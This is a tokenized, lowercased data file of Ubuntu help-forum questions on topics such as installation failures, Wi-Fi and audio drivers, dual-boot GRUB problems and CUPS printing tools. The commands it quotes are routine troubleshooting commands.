475411	is there an `` on mount '' hook for fuse ?	say i want to make an app to sync my music to cyanogenmod . i would like to examine all mounted volumes ( assuming i enabled usb debugging on my cyanogen driven device ) , then i can just examine the music folder and the ~/music folder . so , i 'm looking for a way to fire a `` new device mounted '' event instead of having to poll .
475414	sound problem after recording with any recorder	recently i am facing this problem..after recording my voice / screen casting with audacity or with kazam / ssr or any other recorder when i play it sounds harshing and noisy ! here is one of my recorded sound - http : //vocaroo.com/i/s1ct0yjvmxqd please listen it and give me a solution .
475417	nvidia ( 331.38 ) ignores underscan setting after boot or loging back in	anytime i log in to my desktop i can mouse to the right and bottom borders and the screen pans an extra inch or two in those directions . usually , that part of the desktop is n't mapped and it 's just dead space ( either blue or black ) . when i open nvidia-settings and go to the `` x server display configuration '' page it is as it should be . underscan is set at `` 36 '' . but , i have to change underscan ( up one or down one ) , apply , then change it back to 36 for it to display properly without any panning to dead space . anyone know how to correct this ?
475418	system image recovery	i need to restore my computer from ubuntu to the system image backup i created on my hard drive before i started installation . please help i screwed with the partitions before hand , and this back up is my only home . please help , i 'm panicking .
475419	how to link and use two or more dropbox accounts simultaneously	i have two dropbox accounts . is it possible to link and use both of the accounts simultaneously without logging in as the different user ? do not confuse with this question .
475421	lenovo ideapad unstable touchpad cursor	i recently installed ubuntu 14.04 on my lenovo yoga 2 pro and there is a problem with the touchpad . whenever i lift my finger from the touchpad or click , the cursor moves a little bit to a random direction which makes me miss the target i wanted to click . this is very annoying and i could n't find a solution online . can anyone tell me whether there is a solution to this problem and how would i fix it ? thanks in advance .
475424	wireless device does not work on compaq presario v2000	i changed to ubuntu 14.04 in this compaq presario v2000 , but the wireless device ( pci ) does not work . i already installed the drivers using ndiswrapper . but it still does not work . what do i need to do to fix this problem ?
475427	can not install anything new	when i type sudo apt-get install gnome-shell archit @ archit-pc : ~ $ sudo apt-get install gnome-shell [ sudo ] password for archit : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : compiz-gnome : depends : gnome-settings-daemon-schemas ( > = 3.4.2-0ubuntu9 ) but it is not going to be installed gnome-shell : depends : libgjs0e ( > = 1.40.1 ) but 1.39.91-0ubuntu1 is to be installed depends : gnome-shell-common ( = 3.10.4-0ubuntu5.1 ) but 3.10.4-0ubuntu5 is to be installed unity-settings-daemon : depends : gnome-settings-daemon-schemas ( > = 3.8 ) but it is not going to be installed depends : gnome-settings-daemon-schemas ( < 3.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i run the -f install command : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : geoclue-2.0 gir1.2-grilo-0.2 libebml3 liblua5.1-0 libmatroska5 libmozjs-17.0-0 re2c use 'apt-get autoremove ' to remove them . the following extra packages will be installed : gnome-settings-daemon-schemas the following new packages will be installed : gnome-settings-daemon-schemas 0 upgraded , 1 newly installed , 0 to remove and 963 not upgraded . 9 not fully installed or removed . need to get 0 b/44.3 kb of archives . after this operation , 189 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 247754 files and directories currently installed . ) preparing to unpack ... /gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.1_all.deb ... unpacking gnome-settings-daemon-schemas ( 3.8.6.1-0ubuntu11.1 ) ... dpkg : error processing archive /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/gconf/gsettings/gnome-settings-daemon.convert ' , which is also in package gnome-settings-daemon 3.10.2-0ubuntu1~saucy6 processing triggers for gconf2 ( 3.2.6-0ubuntu1 ) ... errors were encountered while processing : /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11.1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what should i do to fix this issue ?
475429	compare two outputs from dpkg -- get-selections > output.txt	i have two installed package lists in .txt files this command was run on two different machines with same distro of linux dpkg -- get-selections > output.txt i need to get packages that are installed on first one ( production ) but not installed on second one ( clean install machine ) , and install the packages that are not installed .
475430	how do i run capella reader on ubuntu 12.04 ?	i just installed capella reader on my ubuntu 12.04 installation , under wine , and started it . this throws a series of dialogs with error messages : e.g . it displays scores , but omitting the notes . the 'playback ' function works . i notice the problem is mentioned here , but the indicated solution ( to regenerate the fonts ) does n't change a thing ; and here , which suggests upgrading wine might help . have you resolved this problem ? how ? what is the recommended resolution ?
475431	sony vaio boot error	i have a sony vaio , with the following specs : vpcf12m1e / h intel core i5-520m 2.4 ghz 4 gb 1066 mhz 500 gb s-ata 7200 rpm blu-ray combo drive 1920x1080 monitor nvidia geforce gt 330m 1024 mb ddr3 windows 7 home premium ( 64bit ) i tried to make ubuntu 14.04 on two sticks , each time after restart , i get this error : boot error i created the disk with : linux live usb creator , unetbootin-windows-585 , universal-usb-installer-1.9 . 5.3 . i tried versions from 12.04.4 through 14.04 and get the same error . http : //imageshack.com/a/img841/2719/qe97u.jpg
475433	how to set up a network for home network	i am trying to set up a home network . i have two laptops and a tower all running ubuntu 14.01 and have been trying to link them together in a private network with no internet access . i ca n't figure out how to get them to find each other .
475434	usb keyboard does n't work in ubuntu 14.04	my usb keyboard is n't working in ubuntu 14.04 , but also did n't work in 13.10 . i upgraded today in the hope that the issue would be resolved , but it was n't . the keyboard works in bios and grub but stops working when i reach the login screen . it is detected by the system , but just does n't work . output of lsusb : bus 002 device 002 : id 0846:9011 netgear , inc. wnda3100v2 802.11abgn [ broadcom bcm4323 ] bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 1532:000d razer usa , ltd bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 002 : id 060b:2231 solid year ksk-6001 uelx keyboard bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i added : hid usbhid hid_generic ohci_pci to /etc/initramfs-tools/modules and did update-initramfs -u , but that did n't work . output of xinput : virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ razer razer diamondback 3g id=9 [ slave pointer ( 2 ) ] virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ kb usb keyboard id=8 [ slave keyboard ( 3 ) ] output of dmesg : [ 670.988075 ] usb 8-2 : usb disconnect , device number 7 [ 711.860023 ] usb 8-2 : new low-speed usb device number 8 using uhci_hcd [ 712.125038 ] usb 8-2 : new usb device found , idvendor=060b , idproduct=2231 [ 712.125042 ] usb 8-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 712.125045 ] usb 8-2 : product : usb keyboard [ 712.125048 ] usb 8-2 : manufacturer : kb [ 712.187568 ] input : kb usb keyboard as /devices/pci0000:00/0000:00:1d.2/usb8/8-2/8-2:1.0/input/input34 [ 712.187709 ] hid-generic 0003:060b:2231.001d : input , hidraw0 : usb hid v1.11 keyboard [ kb usb keyboard ] on usb-0000:00:1d.2-2/input0 [ 712.269196 ] hid ( null ) : usage index exceeded [ 712.269577 ] hid-generic 0003:060b:2231.001e : usage index exceeded [ 712.269581 ] hid-generic 0003:060b:2231.001e : item 0 2 2 2 parsing failed [ 712.269591 ] hid-generic : probe of 0003:060b:2231.001e failed with error -22
475442	install ubuntu 14.04 on bios legacy laptop ( does n't support uefi )	i have laptops core2duo and pentium from hp and toshiba ( all do n't support uefi and have no secure boot option in bios ) , i tried all the ways to install ubuntu ( x32 & & x64 ) on them but i got black screen with flashing cursor all the time ( with bootable flashes and dvds ) . i tried with one and installed windows 8.1 to disable uefi from it , but this did n't work . finally , i installed ubuntu with unetbootin with the option of install iso file on the same windows partition so i must use dual-boot . i want to install ubuntu only without dual boot , i read all the posts about this issue but i found no solution .
475444	how can i disable the `` voice '' feature ( ubuntu 12.04 )	ok.. now i feel really stoopid . i researched this as best i can , but have n't been able to locate anything about this particular occurrence . i must have inadvertently clicked a key or combination of keys that result in the computer `` voicing '' any keys that i type . this is not 'reading the content on the screen ' kind of thing - just voices the keys as i input them . i 'm sure this is a software or something that is resident on the computer through ubuntu as an aid to the visually impaired ( for instance ) ... and you can load it as needed . this situation happens particularly upon sign-in and seems to go away after logging in - and is not a factor when using the keyboard for internet browsing or anything - but it 's back again after i sign off and re-boot the computer ( again - at the sign-in prompt ) . it 's great to have my password requested and have it `` announced '' as i type it - to whomever might be within earshot . no , really ... anyway , how can we disable this ( under different circumstances , i 'm sure ) useful/helpful feature ? we are running ubuntu 12.04 . thanks . : )
475445	dual frame buffer on ubuntu 12.04 intel hd graphics 4600 i7-4770	i have 2 monitors connected to the pc , one in hdmi , one in dvi . i have intel integrated graphics hd4600 now as far my understanding , both the monitors is connected at the same framebuffer /dev/fb0 how can i detach them and create 2 frame buffers at startup , so that i can directly write to the second monitor , by writing on the /dev/fb1 , and not hamper the /dev/fb0 , so that x-server can run normally on that ?
475447	error on firstrun ... ?	so just installed ubuntu 14.04 lts on a new system . 4 gigs of memory ( but details is reporting 3.8 for some reason ? ) amd fx 8320 cpu amd video addin card hd6770 and 2.0 tb hd i just finished installing from usb and the first boot after logging in , i got an error when i opened the ... search / apps menu . it said compiz crashed , i sent an error report ... how can i fix this ?
475449	booting ubuntu efi on macbook pro apple bootmanager	following : http : //www.rodsbooks.com/ubuntu-efi/ and https : //help.ubuntu.com/community/uefibooting # detect_.28u.29efi_firmware_processor_architecture i have ubuntu booting on my macbook pro with both refined and the native apple loader working , however , i would like to get the `` improving the boot method '' ( i believe it is called the kernel efi stub loader ) working with the apple boot manager ( the article only explains for refined ) , but have found no articles explaining this . can anyone help with this ? below is what i have : what i have is the following : /dev/sda apple partitions /boot ext3 ( root ) ext3 swap side notes : from what i understand , i should have had my boot partition as fat32/hfs+ ... i can always switch it or copy the kernel to the apple efi partition . ( i tried creating /boot as an hfs+ partition during installation but was unable . even after installing hfsprogs , although i was able to create an hfs+ partition in gparted i could n't use the partition as /boot in ubiquity ) .
475450	audio suddenly stopped , pulseaudio reinstall has not helped ? ( 14.04 ) [ solved ]	my audio suddenly stopped working in ubuntu 14.04 whilst i was playing something off youtube . i restarted and purged pulseaudio and alsa , reinstalled both and pulseaudio-equaliser as well ( which i have been using successfuly in 14.04 since the beginning ) . the error output when trying to initialize pulseaudio is : e : [ pulseaudio ] module-ladspa-sink.c : master sink not found e : [ pulseaudio ] module.c : failed to load module `` module-ladspa-sink '' ( argument : '' sink_name=ladspa_output.mbeq_1197.mbeq master= plugin=mbeq_1197 label=mbeq control=-0.2 , -0.2 , -0.2 , -0.2,3.5,3.5,3.5,3.5,3.5,3.5,3.5,2.5,2.5,0.0,0.0 '' ) : initialization failed . e : [ pulseaudio ] main.c : module load failed . e : [ pulseaudio ] main.c : failed to initialise daemon . i have checked another thread with a similar question however the solution seemed to work for an older version of ubuntu . i have tried that here as well with no luck . ( trying to remove the pulseaudio config files from /usr/etc/pulseaudio ) note : i have found no .pulse folder in my home directory to purge . thanks for any help in advance .
475452	how would i install portable virtual box to a usb drive to run on any linux ( ubuntu ) host	looking for info on google i can only find solutions to do it ( install portable virtual box ) on a windows host , but i want it backward , i run linux ( ubuntu ) and i want to create a portable virtual machine to install windows 8.1 on it ( using virtual box ) to carry on a flash drive . how would i create a portable windows 8.1 virtual machine using virtual box ?
475453	can i install lamp over an existing apache ?	i 'm setting up my first vps , and i installed and configured apache before i realized that there was the lamp package to do that for me . can i just run sudo apt-get install lamp-server^ or do i have to uninstall the existing apache first ? from what i read , uninstalling apache can be a bit of a pain , so i 'd rather avoid it if i can .
475455	is it possible to install dmg2img_1.6.1-1ubuntu2 on 12.04	i wish to use an older version of dmg2img i.e . 1.6.1 . however , the current version of dmg2img that i have is 1.6.2 . where is this file located ?
475456	given a used laptop with ubuntu installed , how do i get past the password demands ?	recently given a laptop with ubuntu 12.1 installed alongside windows 7 . can only access ubuntu , which is fine for everyday use ( libreoffice , firefox , etc . ) but there 's an authentication password required to install the 500+ updates , and when trying to run anything in terminal , it asks for `` quiz 's '' password . it wo n't allow me to go into root mode to bypass the password ( if that 's even a real thing ? ) . i 'm completely new to linux , but am fascinated at the capabilities and would like to mess around some more , but keep getting stopped by these passwords . what do i have to do ? uninstall and re-install ? how does one do that if i do n't even have access to the windows 7 os because it is password protected as well ? thanks in advance for any information and help .
475457	error with composite-2014 package	so i have installed maya 2014 , and then when i tried to install another program i got this error e : the package composite-2014 needs to be re installed , but i ca n't find an archive for it . and then i realize that i could n't do anything , or install or remove i always got that problem . i 've been searching for this error on forums but i cant find a solution help me pls
475458	no apps appear in unity dash after gnome installation	i tried to install gnome 13.12 following this answer . first , i 've encountered a problem of `` failed to open session '' , i re-installed ubuntu-desktop to restart unity , and it worked . however , now i can not see any application when i search in the unity dash : no terminal , no vlc ... the applications are available but unity dash does not display them in search results . how can i solve this problem ?
475459	dual boot , sony viao , all in one portable desktop , not working and crashes	i am a fan of ubuntu but ever since i bought my new computers , both sony vaio , i ca n't get them running together with windows 8.1 . when i try wubi , it does n't show the install box , but some other information box . if i remove wubi from the iso and run it as admin on my desktop , it runs and installs but after rebooting , grub never comes up and it gives the error screen.. on my laptop , i had to make a usb install and partition everything myself and that worked for my laptop , for a little while . windows boot loader would override and grub would n't come up no more , unless i try to boot from usb , with no usb in , and after it reboots because there is no usb , now grub opens , but does n't cont . that is what happens with my sony 2 in 1 laptop . my all in one portable just wont boot it period . bios is the problem but i disabled everything that was necessary . help
475464	gparted made some of my hdd capacity dissapear !	my hdd size was 1tb ( dynamic ) and there were already 4 partitions in it . one with the windows c drive ( 450gb ) , another recovery ( 20gb ) , another with some tools from the laptop manufacturer ( about 200mb ) and another with my files in it ( drive t : 450gb ) . so , i boot the cd , tried installing ubuntu 13.10 and tried to partition my drive to dual-boot with windows 7 . when i came to the point to select which partition i should split/create etc , i chose the one with my files ( drive t ) and edited the size to about 350gb . then an error message came up saying that parted can not change dynamic disks and now when i open windows the 100gb that were supposed to exist as unallocated size do not exist and partition t capacity has dropped to 365gb ! ! ! as you can see in the , weird things happen in windows , as the drive shows up with two different capacities in the disk management application . ( note : when i open my computer the disk shows up as 365gb ) has anyone faced a similar problem ? what should i do ?
475467	huawei 3g e3531s data card not working,	installed ubuntu 14.04 on my system.but huawei 3g e3531s data card is not working.can u please suggest me how to get it working.i configured using network connections but it is of no use .
475470	creating a simple bash script with multiple commands	trying to create a bash script that opens gnome-terminal , and then runs ls to display the contents of a directory , but it just opens gnome-terminal . i will be creating some other scripts that also use multiple commands . my script : # ! /bin/bash gnome-terminal ls -a /examplefolder edit : to clarify what i 'm trying to achieve . i 'm trying to create a script that will open gnome-terminal , list the contents of /examplefolder , and then be ready for regular terminal usage . is this possible , or am i barking up the wrong tree ?
475472	man page complete external documentation pdf or text build	ubuntu 14.04 man version 2.6.7.1 gedit version 3.10.4 i 'm in the process of putting together a complete man page documentation , currently as a txt file , hopefully as a pdf eventually once i find a converter with reasonable formatting , with the end goal of being able to make it available to the community as an alternative , update-able resource ( i 've certainly seen enough questions about it ) . the issue i ran into is that the command i 'm using to process the man files returns characters outside the encoding of at least gedit ( have n't tried with alternative editors , yet ) . here is my process so far : alias manget= '' sudo apt-get update & & sudo apt-get upgrade ; man -a /bin/* > binman.txt & & man -a /sbin/* > sbinman.txt ; cat binman.txt sbinman.txt > manall.txt ; gedit manall.txt '' manget once in gedit , the encoding issues seem to crop up near page-breaks , where it will show a fairly long series of non-displayable characters . so , two questions , in essence : 1 ) how do i update character encoding to display these files , if possible ? 2 ) if not , how do i go about either downloading an encoding that supports them , or filtering them from the file selectively ? any help you could provide would be greatly appreciated . note : i downloaded and installed unicode , thinking i might be able to use that to find the appropriate encoding , with no luck ( i think i just do n't know how to use it yet , personally )
475479	problem installing ubuntu on mbr disk scheme not gpt	i 'm having trouble installing ubuntu on my mbr disk scheme with windows 7 already installed on uefi legacy mode but when trying to manual specify partition for installation i found 3 more partitions added automatically and the disk scheme converted to gpt style and lost windows 7 which formatted by ubuntu i do n't want gpt style at all . i have tried ubuntu , elementaryos , fedora latest distro all are the same . is there any way installing ubuntu like before with mbr disk scheme without converting disk to gpt style ?
475483	wi-fi networks not detected anymore	problem : wi-fi networks not detected anymore what triggered it ? my computer froze and i ended up having to restart it using the power switch . in case it could be relevant : it froze while i was using calc , trying to drag and drop items ( bug already filed in libreoffice ) . what have i attempted to solve it ? i was under kubuntu 13.10 when it happened , so i took this opportunity to reinstall the os with kubuntu 14.04 ( no config files were kept ) , but it did n't solve it . current diagnosis : when running `` sudo iwlist wlan0 scan '' , `` wlan0 no scan results '' comes up . the /var/lib/networkmanager/networkmanager.state shows : networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true wimaxenabled=true what could i try ?
475489	wireless is slower in ubuntu with a realtek rtl8188ee card	i installed ubuntu over a default windows installation on my laptop . the wifi connection was fine on the windows installation , but on ubuntu , the latency keeps spiking and will sometimes even take up to a few seconds before returning to normal . i 'm connecting to my college 's wifi , so it may be something on their end . what can do i do to troubleshoot and prevent whatever is causing the difference ? how can i know if it 's the college 's wifi or something with my computer ? edit : after pinging google 100 times , the max ping was 2 seconds and the average was 200ms edit : i think it 's the drivers for the wifi card , since other people are having similar issues . it 's the realtek rtl8188ee card
475490	ubuntu 12.04 host – virtualbox 4.1.12 guest=windows 7 – network will not connect	ubuntu 12.04 host – virtualbox 4.1.12 guest=windows 7 – network will not connect . i 'm using ubuntu 12.04 on an acer aspire 5742-7645 laptop with 4gb memory , intel core i3 processor , intel hd graphics , dvd drive , 802.1 b/g/n , and 500 gb hd . i connect to my router via a wireless connection . i have installed virutalbox 4.1.12 from the ubuntu software center and installed guest additions 4.1.12 in the windows 7 guest session . i have windows xp and windows 7 installed as guests in virtual box the network settings are different for xp and 7 – see below . network settings xp guest = adapter 1 : pcnet-fast iii ( nat ) - network works perfectly and has worked well for several years . network settings win 7 = adapter 1 : intel pro/1000 mt desktop ( bridged adapter , eth1 ) promiscuous mode = allow all cable connected = checked when i originally installed windows 7 , i tried nat and the guest network would not connect . once i changed the setting to the above ( bridged ) the network worked perfectly . however , what i believe is after updates ( not sure if it was an ubuntu or windows update ) the guest network stopped working and i can not get it to connect . interfaces file content auto lo iface lo inet loopback ifconfig yields lou @ lou-aspire-5742 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 1c:75:08:09 : f6:5c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 eth1 link encap : ethernet hwaddr 4c:0f:6e:7c:9f:01 inet addr:192.168.1.104 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4e0f:6eff : fe7c:9f01/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18095 errors:2 dropped:0 overruns:0 frame:24344 tx packets:9281 errors:47 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5301926 ( 5.3 mb ) tx bytes:1441885 ( 1.4 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3208 errors:0 dropped:0 overruns:0 frame:0 tx packets:3208 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:294088 ( 294.0 kb ) tx bytes:294088 ( 294.0 kb ) ipconfig yields the following : windows ip configuration ethernet adapter local area connection : connection-specific dns suffix . : link-local ipv6 address . . . . . : fe80 : :38ba : dbca : a21d : c3d1 % 13 autoconfiguration ipv4 address . . : 169.254.195.209 subnet mask . . . . . . . . . . . : 255.255.0.0 default gateway . . . . . . . . . : tunnel adapter isatap . { b292e440-679d-4fc5-8e34-77d6804669c8 } : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : tunnel adapter local area connection* 11 : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : i 'm not sure what else to do . can someone provide the troubleshooting steps to determine what the problem is and possible solution ?
475493	ubuntu 14.04 lts wired internet extremely slow	my wired internet is running extremely slow after installing ubuntu 14.04 on my desktop . my normal internet speed ( windows ) using speedtest.net is around 25 mbps , ubuntu is pulling in 0.5 mbps tops . i 've found lots of issues with the 'realtek rtl8111 ethernet interface ' i 've got , they all say to change the drivers to r8168 ( which i 've done ) or change the ipv6 to ignore ( also done ) but my internet is still running extremely slow . i 've tried everything i 've been able to find online and rebooted multiple times along the way but all to no avail . i do n't have much experience with linux , but am eager to learn . what do i need to do to fix this problem ?
475500	failed to install some files when upgrading from 13.10 to 14.4	i commenced an upgrade from 13.10 to 14.40. the program then asked when it had finished , if i would like to delete files that were not used , to which i answered yes . on rebooting the computer to start the new upgraded program , i received the message that the following devices failed to install 'dev/mapper/nvidia_afdedhfe ' and 'grub_term_highlight_colour ' not found . it then presented me with the terminal and a prompt of 'grub rescue > ' . i am new to linux . what do i do next to try and fix the problem . thanks
475502	truecrypted windows 7 missing in grub2 after upgrade	i have an encrypted dual boot windows 7/ubuntu system and upgraded my ubuntu today . everything went smooth but my windows is not shown in the grub2-list anymore . starting up i have the truecrypt bootloader and after entering the password i get to grub ( now grub2 ) . there my windows 7 entry is missing now . here is my report : http : //paste.ubuntu.com/7569182/ updating grub did nothing to it . my guess is that within ubuntu it does not recognize my windows installation on sda1 anymore . i ca n't mount it aswell . i can only mount it via truecrypt itself . i think i might have to manually insert the menu item for windows into that grub config file . i guess that after entering the password in the truecrypt bootloader it would be possible to start windows if the item was there - just a guess though . edit : i basically followed these steps to set up my system : dual booting windows 7 with ubuntu 12.04lts with truecrypt
475505	how do i use the dowloaded os ubuntu file on my cumputer	i have downloaded ubuntu light to install on my desktop computer as the os but when i want to open the fil i get the following message : '' this file does not have a program associated with it for performing this action . please install or if one is already installed , create an association in the default programs control panel . '' di i directly burn this file to disk like a iso ?
475509	no desktop icons after update to 14.04	updated ubuntu from 12.04 to 14.04 lts . all seemed to go smoothly . after re-boot , the desktop displays the wallpaper and my user name appears with a password prompt . ubuntu 14.04 lts appears in the lower left . the mouse is detected and works as described below . after entering my password , a message box appears with `` system program problem detected . do you want to report problem now ? cancel report problem ? selecting either choice results in the message box disappearing but no desktop icons appear and the wallpaper remains . there does not appear to be any way to start a terminal , initiate a shutdown/re-boot and make any selection . i have to do a hard power button reset to get off the wallpaper screen . i have already tried this recommended post : press ctrl+alt+f3- > enter your username & password - > enter these commands- > sudo apt-get update - > sudo apt-get install âreinstall ubuntu-desktop - > sudo apt-get install unity - > sudo shutdown now - > turn on your pc & check ! â jax-l may 2 at 16:11 and i have tried this similar posting : sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install unity thanks for any reply .
475511	recommended setup for live audio / video broadcast	we would like to capture audio from a mixer and video from a camera and transmit it via wi-fi to adjacent rooms of an auditorium . what kind of broadcast/streaming programs/setup do you suggest ? we just need : low latency . ( less than 1 second is good ) ease of use . ( hopefully , the stream should be easily accessible and played by mobile devices ( ipad/android ) without any added techie configuration on the clients . ) if you had any experience with this , it will be highly appreciated . : ) more details here : https : //superuser.com/questions/762470/setup-for-a-live-low-latency-audio-video-broadcast-over-wi-fi
475512	application installed using wine can not be uninstalled	recently i installed advanced system care 7.2 in my ubuntu 14.04 using wine . i installed it to know how to use wine , since it was the first time i was using it . after the installation i tried to uninstall it , but i ca n't . 2 software named 'iobit uninstaller ' and 'surfing protection ' also get installed along advanced system care . i removed those 2 software using wine , but can not remove advanced system care . why ca n't i remove and how can i remove it ?
475513	chrome in the launcher does not open with keyboard hotkey ( super + # )	i 'm running ubuntu 14.04 lts and i have chrome as the first application locked in my launcher . when i click it or press super+1 the chrome icon just flashes , but never opens the app . all other apps open fine . i have to manually find it in unity and launch it from there , or from terminal . i 've set this to launch properly on another machine but i do n't know why it 's not working on my laptop . why does this happen ?
475514	how to share a folder in the same pc between ubuntu and windows	i need to know if its possible to share a folder , so that i can open the files in it from ubuntu and windows . at the time , i 'm using windows but planning to move back to ubuntu but my problem would be losing some compatibility that windows offers when i do college work , and that can be a pain , so my plan is to dual boot and have both oses . but i do n't want to be logged in and out of each os in order to work or share files . so is there a way to share folders or files between , lets say , ubuntu 14.04 and windows 7 ?
475517	what would happen if init was deleted ?	just a theoretical question ... but what would happen if init ( in /sbin/init ) would be removed ?
475519	how can i get sound back in pulseaudio ubuntu 12.04	i have the indication of audio from looking at pulseaudio volume control , output device because the bars at the bottom move when youtube plays a video . i have been looking for weeks , please help me find my sound on ubuntu 12.04 . i purged it some weeks ago and have been putting the parts back together that purge goofed up and can not seem to fix the final part . robin @ robin-hp-g62-notebook-pc : ~ $ aplay -l ** list of playback hardware devices ** card 0 : mid [ hda intel mid ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 robin @ robin-hp-g62-notebook-pc : ~ $
475521	how to clear the screen on vi exit ?	in my experience on many different servers , vi has always cleared the screen when returning to the shell . but on my new ubuntu vps , it does not . the contents of the file stay on the screen until new lines from the shell scroll up over them . worse , whatever i was working on in the shell before i started vi is gone . other solutions to this problem say it 's the terminal client , but i 'm using the same client ( putty ) that i use on my other servers , and they all clear the screen when vi exits . ( the terminal type is xterm , and putty is also set to xterm ) . possibly it 's some setting that experienced admins know about but i do n't since this is my first time setting up a server . it 's also my first ubuntu . i do n't see how it could be the client when the same client behaves differently on other servers , but i 'm willing to try anything . any help will be appreciated .
475526	unable to install ubuntu onto a blank hard drive	i just built a pc and i am trying to install ubuntu 14 onto it . i did the process in which you format the flash drive to be able to have ubuntu 14 and install directly in bios . bios is set up to boot from the flash drive . every time i try to do the install process , it will randomly reboot itself onto the motherboard bios menu . this loop constantly occurs and the only way i can use ubuntu is to put the option of trying but not installing . help !
475529	14.04 wo n't see new network card	after installing 14.04 64 bit , if i add a new wired network card , the system will not see it . it is visible in lspci but it is not visible to linux . it will not show up in ifconfig . i have tried three different machines and different network cards , so this must be some security setting in the os ? any clues ?
475533	why is n't chrome rendering images and fonts correctly ?	i have an acer monitor and an intel pentium 4 running 12.04 32-bit . chrome renders all webpages like this : this is how cnn should look : i have firefox installed and its images/fonts look fine . i am new to ubuntu and comfortable with using terminal . beyond that , i have no idea what i 'm doing . this happened all of a sudden a few weeks ago . any suggestions would be very much appreciated . thanks in advance .
475535	install vim offline	i have ubuntu 12.04.02 desktop in my college lab of around 15 pcs with no internet connection . i used to install packages : sudo apt-get install vim it was just fine . but , now i want to install vim locally ( i.e. , using a pendrive or cd drive ) . where and how can i accomplish this , as i am new to it . through googling , i could get some sites offering packages , but i have merely any idea on how to carry on : https : //launchpad.net/ubuntu/precise/+source/vim http : //www.ubuntuupdates.org/package/core/precise/main/base/vim http : //pkgs.org/ubuntu-12.04/ubuntu-main-i386/vim-gnome_7.3.429-2ubuntu2_i386.deb.html what should i exactly download and where to store it in my ubuntu machine and run commands to properly install vim offline ? any word of advice is appreciated !
475538	win8 x64 laptop ( samsung ) unable to boot after installing ubuntu	i posted here a while back and no one was able to help me so i am going to try to explain my problem better . i have a samsung series 7 ultrabook and i connected a usb optical drive with an ubuntu 14.04 installation disc . i did not set or change any of my partitions , however , as i mainly wanted to just be able to boot from the disc and fool around with ubuntu . upon restarting my computer i get a blue-screen message saying : recovery your pc needs to be repiared the boot configuration date file is missing some required information . file : \bcd error code : 0xc000000d you 'll need to use the recovery tools on your installing media . if you do n't have any installation media ( like a disc or usb device ) , contact your system administrator or pc manufacturer . however i am never given the option to even try to boot to anything . when i turn my computer on the optical drive spins and then after a moment or two comes to a halt . i turned off safeboot and switched it to csm ( i believe that is what it is called ) mode , and that makes it so when i turn my computer on it takes me to a windows recovery screen . i am able to change the date i want to recover and view all the applications installed , however upon recovering windows says `` all boot options are tried . press key to recover with factory image using recovery or any other keys for next boot loop iteration . '' it seems to be stuck in a loop . can someone please help me ? ! i 'm so confused and nothing is working !
475539	how to get working cups command line tools on server 14.04	it looks like some of the commands like lpr and lprm have broken versions that do n't work with cups . these commands worked properly on 10.04. lpr for cups has an -o option , but no lpr is intalled when cups is installed , and the lpr installed with apt-get install lpr does not have the -o option and does not appear to be the cups version of lpr . man lpr shows bsd general commands manual at the top , where man lpr on the ubuntu 10.04 server said apple , inc in the same spot . which leads me to believe the `` wrong '' lpr is in the `` lpr '' package or package names got moved around . there is also a lprng package , but trying to install it wants to remove cups and cups-client . lprm also returns lprm : printername : unknown printer when printername is in fact a valid printer installed with cups and does appear in lpstat -t. how do i get the proper cups versions of lpr working on server 14.04 ?
